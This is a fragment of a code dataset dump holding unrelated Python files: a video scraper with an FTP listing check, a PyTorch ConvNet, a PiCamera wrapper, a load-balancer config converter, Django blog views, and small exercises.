str(index)\n d.mkdir()\n p = d / \".gitignore\"\n files.append(p)\n monkeypatch.setattr(fetch_gitignore.requests, 'get', self.mock_get)\n dirs.append(d)\n fetch_gitignore.get_gitingnore('http://thisisatest.com', dirs)\n for ignore in files:\n assert ignore.read_text() == \"test data\\n# VS Code\\n.vscode/\"\n assert len(list(tmp_path.iterdir())) == 3\n\n\n","sub_path":"fetch_gitignore_tests.py","file_name":"fetch_gitignore_tests.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"385520472","text":"#! python\n# -*- coding: utf-8 -*-\nimport re\nimport os\nimport pickle\nimport requests\nimport argparse\nfrom ftplib import FTP\nfrom time import sleep\nfrom random import choice\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom datetime import datetime, timedelta\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-u', '--user', required=True)\nparser.add_argument('-p', '--password', required=True)\nargv = parser.parse_args()\n\n\n############### All video source goes here ###############\nmp4_save_path = '' # mp4文件保存路径\nvideos_source = {}\nvideos_source['popnews'] = []\nvideos_source['pearvideo'] = []\nvideos_source['chinanews'] = []\nvideos_source['itouchtv'] = []\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=new', '最新']) # Pop News 最新\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=a', '港聞']) # Pop News 港闻\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=f', '娛樂']) # Pop News 娱乐\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=b', '國際']) # Pop News 国际\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=e', '兩岸']) # Pop News 两岸\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=l', '生活']) # Pop News 生活\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=m', '電影']) # Pop News 电影\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=c', '體育']) # Pop News 体育\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=d', '財經']) # Pop News 财经\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=s', '親子王']) # Pop News 亲子王\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=ppl', '名人導航']) # Pop News 名人导航\nvideos_source['popnews'].append(['http://pop.stheadline.com/section.php?cat=h', '地產']) # Pop News 地產\nvideos_source['pearvideo'].append('https://www.pearvideo.com/category_2') # 梨视频 世界\nvideos_source['chinanews'].append('https://www.chinanews.com/shipin/') # 中新网\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/', '推荐']) # 触电新闻 推荐\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/funny', '搞笑']) # 触电新闻 搞笑\n#videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/food', '美食']) # 触电新闻 美食\n# videos_source['itouchtv'].append(['https://www.itouchtv.cn/news/fashion', '时尚']) # 触电新闻 时尚\nvideos_source['itouchtv'].append(['https://www.itouchtv.cn/news/video', '视频']) # 触电新闻 视频\n\n############### All video sources go here ###############\n\n### 模拟浏览器 User-Agent\ndesktop_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.98 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 
6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0']\n\n\n# 随机 浏览器 User-Agent\ndef random_headers():\n return {'User-Agent': choice(desktop_agents), 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'}\n\n\n# 视频下载器\ndef video_downloader(file_path, file_name, download_link):\n supported_video_format = ['mp4']\n format_supported = False\n path = os.path.join(*[mp4_save_path, file_path, re.sub('\\?|\\|\\*|\\\"', '', file_name) + '.mp4'])\n for video_format in supported_video_format:\n if video_format in download_link:\n format_supported = True\n if not format_supported:\n print('视频格式不支持: %s' % download_link)\n return\n if os.path.exists(path):\n print('{} 已存在'.format(path))\n return\n req = requests.get(download_link)\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n with open(path, 'wb') as f:\n f.write(req.content)\n f.close()\n print(\"{} downloaded {}\".format(file_name, f.name))\n\n# 捉取触电新闻MP4链接\ndef itouchtv_video_handler():\n for source in videos_source['itouchtv']:\n driver.maximize_window()\n # driver.set_page_load_timeout(30)\n try:\n driver.get(source[0])\n except:\n continue\n windows_height = driver.execute_script(\"return document.body.clientHeight\")\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n sleep(2)\n while driver.execute_script(\"return document.body.clientHeight\") > windows_height:\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight-50);\")\n windows_height = driver.execute_script(\"return document.body.clientHeight\")\n sleep(2)\n\n soup = BeautifulSoup(driver.page_source, 'html.parser')\n videos_div = soup.findAll('div', {\"class\": \"pushList__pushItem___bgsfJ\"})\n for item in videos_div:\n video_sublink = item.find('a', {\"class\": \"pushList__pushItemBox___2MME6\"})['href']\n video_title = item.find('a', {\"class\": \"pushList__pushItemBox___2MME6\"})['title']\n print(video_sublink, video_title)\n driver.get('https://www.itouchtv.cn%s' % video_sublink)\n sleep(3)\n if re.search('src=\\\"(http.*?\\.mp4)', driver.page_source):\n video_link = re.search('src=\\\"(http.*?\\.mp4)', driver.page_source).group(1)\n print(video_title, video_link)\n video_downloader('itouchtv', video_title, video_link)\n\n\n# 捉取梨视频MP4链接\ndef pear_video_handler():\n for source in videos_source['pearvideo']:\n req = requests.get(source, headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n videos_li = soup.find_all('li', class_='categoryem')\n for video in videos_li:\n video_title = video.find('div', class_='vervideo-title').string\n video_sub_page = 'https://pearvideo.com/' + video.find('a').get('href')\n req = requests.get(video_sub_page, headers=random_headers())\n if re.search('http.*\\.mp4', html_decoder(req)):\n video_link = re.search('http.*\\.mp4', html_decoder(req)).group(0)\n print(video_title, video_sub_page, video_link)\n video_downloader('pearvideo', video_title, video_link)\n\n\n\ndef pop_news_handler(selen_webdriver):\n \"\"\"\n 捉取POPNEWS MP4链接\n :param selen_webdriver: selenium webdrver\n :return: list [视频链接, 视频标题, 视频分类]\n \"\"\"\n video_records = {}\n selen_webdriver.implicitly_wait(20)\n # driver.set_page_load_timeout(30)\n selen_webdriver.maximize_window()\n for source in videos_source['popnews']:\n req = 
requests.get(source[0], headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n # 类别页面出错handler 跳过\n try:\n videos_list = soup.find('div', id='catPlayListB').find_all('div', class_='trailer')\n for video in videos_list:\n video_sub_page = 'http://pop.stheadline.com/' + video.find('a').get('href')\n video_title = video.find('a').get('title')\n # req = requests.get(video_sub_page, headers=random_headers())\n try:\n selen_webdriver.get(video_sub_page)\n except:\n continue\n if re.search('http.*\\.mp4', selen_webdriver.page_source):\n video_link = re.search('http.*\\.mp4', selen_webdriver.page_source).group(0)\n print(video_title, video_sub_page, video_link)\n video_records[os.path.basename(video_link)] = [video_title, source[1]] # 视频链接, 视频标题, 视频分类\n except:\n pass\n selen_webdriver.close()\n return video_records\n\n\ndef popnews_ftp_comparor(selen_webdriver, debug_mode=False):\n \"\"\"\n :param selen_webdriver: selenium webdrver\n :param debug_mode:\n :type debug_mode: boolean default False\n True: load video_records from pickle file\n False: run pop_news_handler() to get video_records\n \"\"\"\n ftp_url = '203.80.0.177'\n user = argv.user\n passwd = argv.password\n today_date = (datetime.now() - timedelta(days=0)).strftime(\"%Y%m%d\") # 20180904\n\n if debug_mode:\n with open('test_records.pkl', 'rb') as f:\n video_records = pickle.load(f)\n f.close()\n else:\n video_records = pop_news_handler(selen_webdriver=selen_webdriver)\n # 保存 video_records 测试用途\n with open('test_records.pkl', 'wb') as f:\n pickle.dump(video_records, f)\n f.close()\n\n ftp = FTP(ftp_url)\n ftp.login(user, passwd)\n file_gen = ftp.mlsd('headline/%s' % today_date)\n ftp.dir('headline/%s' % today_date)\n csv_name = os.path.join(mp4_save_path, 'popnews%s.csv' % today_date)\n if os.path.exists(csv_name):\n os.remove(csv_name)\n\n videos_dict = {}\n for fg in file_gen:\n mp4_name = fg[0]\n if mp4_name in video_records:\n video_title = video_records[mp4_name][0]\n video_cat = video_records[mp4_name][1]\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n else:\n if os.path.exists(csv_name):\n with open(csv_name, 'r', encoding='utf-8') as f:\n f_content = f.read()\n f.close()\n if mp4_name in f_content:\n continue\n video_title = ''\n video_cat = ''\n\n print(\"找到视频:{0} 标题:{1} 分类:{2}\".format(mp4_name, video_title, video_cat))\n if not videos_dict.get(video_cat, None): videos_dict[video_cat] = {}\n videos_dict[video_cat][mp4_name] = {\"video_title\": video_title}\n with open(csv_name, 'w', encoding='utf-8') as f:\n write_str = \"\"\n for cat, val in videos_dict.items():\n for video_mp4_name, video_val in val.items():\n write_str += '{0},{1},{2}\\n'.format(video_mp4_name,\n video_val['video_title'].replace(',', ' '),\n cat)\n f.write(write_str)\n f.close()\n\n\n# 捉取中新网MP4链接\ndef china_news_handler():\n for source in videos_source['chinanews']:\n req = requests.get(source, headers=random_headers())\n soup = BeautifulSoup(html_decoder(req), 'html.parser')\n short_videos_div = (soup.find(href='http://www.chinanews.com/shipin/m/duan/views.shtml')\n .find_next(class_='splist')\n .find_all(class_='splist_div'))\n\n for div in short_videos_div:\n video_title = div.find('p').string\n video_sub_page = 'http://www.chinanews.com' + div.find('a').get('href')\n req = requests.get(video_sub_page, headers=random_headers())\n if re.search('http.*\\.mp4', html_decoder(req)):\n video_link = 
re.search('http.*\\.mp4', html_decoder(req)).group(0)\n print(video_title, video_sub_page, video_link)\n video_downloader('chinanews', video_title.strip(), video_link)\n\n\n# html 中文内容解码\ndef html_decoder(req):\n if not ('utf-8' in req.apparent_encoding.lower() or 'utf-8' in req.encoding.lower()):\n return req.content.decode('gbk')\n else:\n return req.text\n\n\ndef main():\n for source in videos_source:\n if source == 'popnews':\n popnews_ftp_comparor(webdriver=driver)\n# if source == 'pearvideo':\n# pear_video_handler()\n# if source == 'chinanews':\n# china_news_handler()\n# if source == 'itouchtv':\n# itouchtv_video_handler()\n\n\n# 下载对应版本Edge 驱动 https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/\n# 放到此目录下\nif os.path.exists('MicrosoftWebDriver.exe'):\n driver = webdriver.Edge(executable_path='MicrosoftWebDriver.exe')\nelif os.path.exists('chromedriver.exe'):\n driver = webdriver.Chrome(executable_path='chromedriver.exe')\nelse:\n print('缺少 web driver')\n exit(1)\n\ntry:\n main()\n driver.close()\n driver.quit()\nexcept Exception as e:\n print(e)\n driver.close()\n driver.quit()\n","sub_path":"mp4_downloader.py","file_name":"mp4_downloader.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
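\n# Usage sketch: run from the command line with FTP credentials; a matching\n# webdriver binary must sit next to this script (credential values below are\n# placeholders):\n#\n#   python mp4_downloader.py -u FTP_USER -p FTP_PASSWORD\n","sub_path":"mp4_downloader.py","file_name":"mp4_downloader.py","file_ext":"py","file_size_in_byte":13715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}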
+{"seq_id":"269986496","text":"\"\"\"\r\nCe programme permet de converteir des Euros en Dollars après avoir\r\ndemandé à l'utilisateur de saisir le taux de change le plus récent\r\n\"\"\"\r\nimport os\r\na=float(input(\"entrer la valeur du taux e change €/$: \"))\r\ni=1\r\nwhile i<=16384:\r\n print(str(i)+\" euro(s) = \"+str(i*a)+\" dollar(s)\")\r\n i*=2 #multiplying i by 2\r\nos.system(\"pause\")\r\n","sub_path":"Swinnen_4.2.py","file_name":"Swinnen_4.2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"74957363","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(10**6)\n\nn, m = list(map(int, input().split()))\n\n\n# 2x+2y+2z=2n\n# 3x+3y+3z=3n\n# 4x+4y+4z=4n\n\n# 2x+3y+4z=m\n\n# x-z=3n-m\n# y+2z=m-2n\n# 2x+y=4n-m\n\n# y = m-2n-2z\n# x = 3n-m+z\n# z = z\n\ndef check(x, y, z):\n if x >= 0 and y >= 0 and z >= 0:\n return True\n else:\n return False\n\n\nfor z in range(0, 10**5+1):\n x = 3*n-m+z\n y = m-2*n-2*z\n z = z\n\n if check(x, y, z):\n print(x, y, z)\n exit()\n\nprint(-1, -1, -1)\n","sub_path":"abc006/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"171055219","text":"# architecture replicated from DoReFaNet code at\n# https://github.com/ppwwyyxx/tensorpack/blob/master/examples/DoReFa-Net\n\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nfrom activations import CAbs\nfrom util.reshapemodule import ReshapeBatch\n\n\nclass ConvNet8(nn.Module):\n def __init__(self, nonlin=nn.ReLU, use_batchnorm=True, use_dropout=True,\n input_shape=(3, 40, 40), no_step_last=False, separate_activations=True):\n super().__init__()\n self.use_batchnorm = use_batchnorm\n self.use_dropout = use_dropout\n self.separate_activations = separate_activations\n bias = not use_batchnorm\n\n if input_shape[1] == 40:\n pad0 = 0\n ks6 = 5\n elif input_shape[1] == 32:\n pad0 = 2\n ks6 = 4\n else:\n raise NotImplementedError('no other input sizes are currently supported')\n\n block0 = OrderedDict([\n # padding = valid\n ('conv0', nn.Conv2d(3, 48, kernel_size=5, padding=pad0, bias=True)), \n ('maxpool0', nn.MaxPool2d(2)), # padding = same\n ('nonlin1', nonlin()) # 18\n ])\n\n block1 = OrderedDict([\n # padding = same\n ('conv1', nn.Conv2d(48, 64, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm1', nn.BatchNorm2d(64, eps=1e-4)),\n ('nonlin1', nonlin()),\n ])\n\n block2 = OrderedDict([\n # padding = same\n ('conv2', nn.Conv2d(64, 64, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm2', nn.BatchNorm2d(64, eps=1e-4)),\n ('maxpool1', nn.MaxPool2d(2)), # padding = same\n ('nonlin2', nonlin()), # 9\n ])\n\n block3 = OrderedDict([\n # padding = valid\n ('conv3', nn.Conv2d(64, 128, kernel_size=3, padding=0, bias=bias)), \n ('batchnorm3', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin3', nonlin()), # 7\n ])\n\n block4 = OrderedDict([\n # padding = same\n ('conv4', nn.Conv2d(128, 128, kernel_size=3, padding=1, bias=bias)), \n ('batchnorm4', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin4', nonlin()),\n ])\n\n block5 = OrderedDict([\n # padding = valid\n ('conv5', nn.Conv2d(128, 128, kernel_size=3, padding=0, bias=bias)), \n ('batchnorm5', nn.BatchNorm2d(128, eps=1e-4)),\n ('nonlin5', nonlin()), # 5\n ])\n\n block6 = OrderedDict([\n ('dropout', nn.Dropout2d()),\n # padding = valid\n ('conv6', nn.Conv2d(128, 512, kernel_size=ks6, padding=0, bias=bias)), \n ('batchnorm6', nn.BatchNorm2d(512, eps=1e-4)),\n ('nonlin6', nonlin() if not no_step_last else CAbs()),\n # ('nonlin6', nonlin() if not relu_last_layer else nn.ReLU()),\n ])\n\n block7 = OrderedDict([\n ('reshape_fc1', ReshapeBatch(-1)),\n ('fc1', nn.Linear(512, 10, bias=True))\n ])\n\n if not self.use_batchnorm:\n del block1['batchnorm1']\n del block2['batchnorm2']\n del block3['batchnorm3']\n del block4['batchnorm4']\n del block5['batchnorm5']\n del block6['batchnorm6']\n if not self.use_dropout:\n del block6['dropout']\n\n if self.separate_activations:\n self.all_modules = nn.ModuleList([\n nn.Sequential(block0),\n nn.Sequential(block1),\n nn.Sequential(block2),\n nn.Sequential(block3),\n nn.Sequential(block4),\n nn.Sequential(block5),\n nn.Sequential(block6),\n nn.Sequential(block7),\n ])\n self.all_activations = nn.ModuleList(\n [nonlin(), nonlin(), nonlin(), nonlin(), \n nonlin(), nonlin(), nonlin()])\n else:\n self.all_modules = nn.Sequential(OrderedDict([\n ('block0', nn.Sequential(block0)),\n ('block1', nn.Sequential(block1)),\n ('block2', nn.Sequential(block2)),\n ('block3', nn.Sequential(block3)),\n ('block4', nn.Sequential(block4)),\n ('block5', nn.Sequential(block5)),\n ('block6', nn.Sequential(block6)),\n ('block7', nn.Sequential(block7)),\n ]))\n\n def forward(self, x):\n if 
self.separate_activations:\n for i, module in enumerate(self.all_modules):\n if i == 0:\n y = module(x)\n else:\n y = module(y)\n if i != len(self.all_modules)-1:\n y = self.all_activations[i](y)\n else:\n y = self.all_modules(x)\n return y\n","sub_path":"code/models/convnet8.py","file_name":"convnet8.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
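\n\n# A minimal smoke test (assumes torch and this repository's activations/util\n# modules are importable; 32x32 input chosen to match the supported sizes):\nif __name__ == '__main__':\n    model = ConvNet8(input_shape=(3, 32, 32))\n    out = model(torch.randn(2, 3, 32, 32))\n    print(out.shape)  # expected: torch.Size([2, 10])\n","sub_path":"code/models/convnet8.py","file_name":"convnet8.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}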
+{"seq_id":"389645873","text":"from picamera import PiCamera\nfrom picamera.array import PiRGBArray\n\nclass Camera:\n\t__instance = None\n\tpiCamera = None\n\tisPreviewing = False\n\n\tdef takePhoto(self):\n\t\tprint(\"Taking photo\")\n\t\trawCapture = PiRGBArray(self.piCamera)\n\t\tself.piCamera.capture(rawCapture, format=\"bgr\")\n\t\treturn rawCapture.array\n\n\tdef togglePreview(self):\n\t\tprint(\"Toggling preview\")\n\n\t\tif self.isPreviewing:\n\t\t\tself.piCamera.stop_preview()\n\t\telse:\n\t\t\tself.piCamera.start_preview(fullscreen=False, window=(100, 20, 640, 480))\n\t\tself.isPreviewing = not self.isPreviewing\n\n\t@staticmethod\n\tdef getInstance():\n\t\t\"\"\" Static access method. \"\"\"\n\t\tif Camera.__instance == None:\n\t\t\tCamera()\n\t\treturn Camera.__instance\n\n\tdef __init__(self):\n\t\tprint(\"Initializing Camera\")\n\t\tif Camera.__instance != None:\n\t\t\tprint(\"Camera was already initialized, throwing exception\")\n\t\t\traise Exception(\"This class is a singleton!\")\n\t\telse:\n\t\t\tprint(\"Setting PiCamera wrapper\")\n\t\t\tself.piCamera = PiCamera()\n\t\t\tself.piCamera.rotation = 180\n\t\t\tCamera.__instance = self\n\n\n\n\n","sub_path":"Camera.py","file_name":"Camera.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"568721026","text":"import socket\n#Port Mappings\ndef port_mappings(port):\n port = str(port)\n if port == '':\n mapped_port = '0'\n mapped_port_name = 'any'\n elif port == 'www':\n mapped_port = '80'\n mapped_port_name = 'http'\n elif port == 'https':\n mapped_port = '443'\n mapped_port_name = 'https'\n else:\n mapped_port = port\n mapped_port_name = port\n return (mapped_port, mapped_port_name)\n\n#DNS Mappings\ndef dns_mappings(ip_address):\n try:\n domain_lookup = True\n domain_name = socket.gethostbyaddr(ip_address)\n domain_split = domain_name[0].split('.')\n init_name = domain_split[0]\n except:\n domain_lookup = False\n init_name = None\n return (domain_lookup, init_name)\n#LB algorithm Mappings\ndef lb_algorithm_mappings(ace_lb_method):\n if ace_lb_method == \"leastconns\":\n lb_method = \"least-connections-member\"\n else:\n lb_method = \"round-robin\" \n return(lb_method)\n\n#Write Rules\ndef write_irule(rule_type, rule_method, rule_value, irule_pool_name, counter_outer_irule, counter_inner_irule, file_handle):\n if rule_type == \"http\" and rule_method == \"url\":\n #config_file = open(path_to_virtual_file, 'a')\n if counter_outer_irule == 0 and counter_inner_irule == 0:\n file_handle.write(\" if {$uri starts_with \\\"/\"+ rule_value.lower() +\"\\\"} {\\n\")\n file_handle.write(\" pool \" + irule_pool_name + \"\\n\")\n file_handle.write(\" }\\n\")\n else:\n file_handle.write(\" elseif {$uri starts_with \\\"/\"+ rule_value.lower() +\"\\\"} {\\n\")\n file_handle.write(\" pool \" + irule_pool_name + \"\\n\")\n file_handle.write(\" }\\n\")\n \n\n#Persistence Profile Mappings\n\ndef persistence_mappings(sticky_type, sticky_value):\n sticky_type = sticky_type.replace(' ', '')\n sticky_type = sticky_type.replace('\\n', '')\n sticky_type = sticky_type.rstrip()\n\n \n sticky_value = sticky_value.replace(' ', '')\n sticky_value = sticky_value.replace('\\n', '')\n sticky_value = sticky_value.rstrip()\n\n if sticky_type == \"ip-netmask\" and sticky_value == \"source\":\n persistence_profile = \"source_addr\"\n elif sticky_type == \"http-cookie\" and sticky_value.lower() == \"jsessionid\":\n persistence_profile = \"JSESSIONID\"\n elif sticky_type == \"http-cookie\":\n persistence_profile = \"cookie\"\n else:\n persistence_profile = \"source_addr\"\n return (persistence_profile, sticky_type)\n\n\n\n\n#Monitor Mappings\n\ndef probe_mappings(poolmember_monitor_name, config_file, dictionary, new_monitor_name):\n if poolmember_monitor_name in dictionary:\n (probe_type, probe_port, probe_method, probe_url, probe_status, probe_regex, probe_host) = dictionary[poolmember_monitor_name]\n if probe_type == \"http\" or probe_type == \"https\":\n config_file.write(\"ltm monitor \" + probe_type + \" \" + new_monitor_name +\" {\\n\")\n config_file.write(\" defaults-from \"+ probe_type + \"\\n\") \n if probe_port != '':\n config_file.write(\" destination *:\" + probe_port + \"\\n\")\n else:\n config_file.write(\" destination *:*\\n\")\n config_file.write(\" interval \" + \"10\" + \"\\n\")\n if probe_regex != '':\n config_file.write(\" recv \" + probe_regex + \"\\n\")\n else:\n if probe_status != '':\n config_file.write(\" recv \" + \"\\\"HTTP/1\\\\.(0|1) (2|3)\\\"\\n\")\n\n if probe_host == '':\n probe_host = \"localhost\"\n probe_method = probe_method.upper()\n if probe_url != '':\n config_file.write(\" send \" + \"\\\"\" + probe_method + \" \" + probe_url + \" HTTP/1.1\\\\r\\\\nHost: \" + probe_host + \"\\\\r\\\\nConnection: Close\\\\r\\\\n\\\\r\\\\n\\n\")\n else:\n config_file.write(\" send 
\" + \"\\\"\" + \"GET\" + \" \" + \"\\/\" + \" HTTP/1.1\\\\r\\\\nHost: \" + probe_host + \"\\\\r\\\\nConnection: Close\\\\r\\\\n\\\\r\\\\n\\n\")\n config_file.write(\" time-until-up 0\\n\")\n config_file.write(\" timeout 31\\n\")\n config_file.write(\"}\\n\")\n\n elif probe_type == \"tcp\" and probe_port !=\"\":\n config_file.write(\"ltm monitor tcp \" + new_monitor_name +\"{\\n\")\n config_file.write(\" defaults-from tcp\\n\")\n config_file.write(\" destination *:\" + probe_port +\"\\n\")\n config_file.write(\" interval \" + \"10\" + \"\\n\")\n config_file.write(\" time-until-up 0\\n\")\n config_file.write(\" timeout 31\\n\")\n config_file.write(\"}\\n\")\n\n elif probe_type == \"tcp\" and probe_port ==\"\":\n new_monitor_name = \"tcp\"\n\n else:\n new_monitor_name = \"gateway-icmp\"\n \n \n \n else:\n new_monitor_name = \"gateway-icmp\"\n\n return (new_monitor_name)\n \n\n \n","sub_path":"parser_functions.py","file_name":"parser_functions.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"78970895","text":"#from django.core.mail import send_mail \nfrom django.shortcuts import render,get_object_or_404, redirect\nfrom .models import Post,Categories,Comment\nfrom django.db.models import Q\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .forms import CommentForm\n\n# Create your views here.\n\ndef index(request):\n imagen = \"/static/img/sidebar.jpg\"\n posts_list = Post.objects.filter(publicado=True).select_related('autor').order_by('-fecha_publicacion')\n categories = Categories.objects.all()\n paginator = Paginator(posts_list, 5)\n page = request.GET.get('page',1)\n try:\n posts = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n posts = paginator.page(1)\n except EmptyPage:\n # If page is out of range (e.g. 9999), deliver last page of results.\n posts = paginator.page(paginator.num_pages)\n\n\n\n return render(request,'blog/index.html',{'image':imagen,'posts':posts, 'categories':categories})\n\n\n\ndef post(request,slug):\n\n post = get_object_or_404(Post,slug=slug)\n print('post: '+post.titulo)\n related = Post.objects.filter(Q(categoria=post.categoria) | Q(autor=post.autor), ~Q(titulo=post.titulo))[:3]\n return render(request,'blog/post/post.html',{'post':post,'related':related})\n\ndef add_comment(request, slug):\n\tpost = get_object_or_404(Post, slug=slug)\n\tprint(request.POST)\n\tif request.method == 'POST':\n\t\treturn JsonResponse({\"prueba\": request.POST.get(\"text\")})\n\n#def add_comment(request, slug):\n# post = get_object_or_404(Post, slug=slug)\n# if request.method == 'POST':\n# form =CommentForm(request.POST)\n# if form.is_valid():\n# comment = form.save(commit=False)\n# comment.post = post\n# comment.save()\n# return redirect('blog:post', slug=post.slug)\n# else:\n# form =CommentForm()\n# template = 'blog/post/add_comment.html'\n# context = {'form': form}\n# return render(request, template, context)\n\n #def contactos(request): \n # errors = [] \n # if request.method == 'POST': \n # if not request.POST.get('asunto', ''): \n # errors.append('Por favor introduce el asunto.') \n # if not request.POST.get('mensaje', ''): \n # errors.append('Por favor introduce un mensaje.') \n # if request.POST.get('email') and '@' not in request.POST['email']: \n # errors.append('Por favor introduce una direccion de email valida.') \n # if not errors: \n # send_mail( request.POST['asunto'], \n # request.POST['mensaje'], \n # request.POST.get('email', 'noreply@example.com'), \n # ['siteowner@example.com'], ) \n # return HttpResponseRedirect('/contactos/gracias/') \n # return render(request, 'formulariocontactos.html', {'errors': errors}) \n\n#13/11/2018 agregado este comando primera parte\n#def categories(request, idcategory):\n# categories = Categories.objects.get(id=idcategories)\n# posts = categories.post_set.order_by(\"-creation_date\")\n\n# return render_to_response(\n# \"home.html\",\n# {\n# \"posts\":posts,\n# },\n# )\n\n#def categories(request):\n# categories = Categories.objects.all()\n# return render(request, 'blog/categorias/index.html',{'categories':categories})\n\n#def categories(request, pk):\n# categories = get_object_or_404(Categories, pk=pk)\n# return render(request, 'blog/base.html',{'categories':categories})\ndef categories(request, slug):\n postt = Post.objects.all()\n slugg = slug\n return render(request,'blog/categorias/cate.html',{'postt':postt, 'slugg': 
slugg})\n","sub_path":"techlinx/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
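\n\n# A matching URLconf sketch (route names assumed from the redirect above,\n# so treat this as illustrative):\n#\n# from django.urls import path\n# from . import views\n#\n# app_name = 'blog'\n# urlpatterns = [\n#     path('', views.index, name='index'),\n#     path('post/<slug:slug>/', views.post, name='post'),\n#     path('post/<slug:slug>/comment/', views.add_comment, name='add_comment'),\n#     path('category/<slug:slug>/', views.categories, name='categories'),\n# ]\n","sub_path":"techlinx/Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}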
+{"seq_id":"223515738","text":"# coding=utf-8\n\"\"\"\npygame-menu\nhttps://github.com/ppizarror/pygame-menu\n\nTHEMES\nTheme class and predefined themes.\n\nLicense:\n-------------------------------------------------------------------------------\nThe MIT License (MIT)\nCopyright 2017-2020 Pablo Pizarro R. @ppizarror\n\nPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the \"Software\"),\nto deal in the Software without restriction, including without limitation\nthe rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software\nis furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR 